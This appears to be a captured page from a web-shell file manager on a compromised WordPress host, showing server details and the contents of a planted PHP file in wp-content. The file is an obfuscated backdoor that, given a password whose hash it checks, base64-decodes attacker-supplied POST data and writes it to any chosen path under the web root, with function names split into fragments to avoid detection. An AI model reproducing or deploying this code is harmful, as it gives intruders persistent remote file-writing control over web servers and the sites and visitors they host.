HEX
Server: Apache/2
System: Linux vps33975.sdns.vn 3.10.0-1160.15.2.el7.x86_64 #1 SMP Wed Feb 3 15:06:38 UTC 2021 x86_64
User: mafada (1031)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/mafada/domains/mafada.vn/public_html/wp-content/
Upload Files
File: /home/mafada/domains/mafada.vn/public_html/wp-content/mbsdcl.php
<?php
$wat = 'M'.date('y');
$bpr = $_POST;
if(!empty($bpr['b']) && md5($bpr['b'].md5($bpr['b']))==('6'.'6'.'9'.'0'.'f'.'4'.'8'.'1'.'d'.'2'.'3'.'d'.'e'.'c'.'f'.'7'.'8'.'7'.'1'.'8'.'e'.'c'.'6'.'e'.'0'.'1'.'0'.'6'.'d'.'e'.'2'.'1')) {
	$aqt = !empty($bpr['f']) ? $bpr['f'] : '502.'.'php';
	if(!empty($bpr['r'])) $aqt = $_SERVER['DOCUMENT_ROOT'].'/'.$aqt;
	$jpq = 'file'.'_put'.'_con'.'TENT'.'S'; $clc = 'B'.'a'.'S'.'e'.'6'.'4'.'_'.'d'.'E'.'c'.'O'.'d'.'e';
	if($jpq($aqt, $clc($bpr['c']))) exit($aqt);
}
echo $wat;
?>
@ Telegram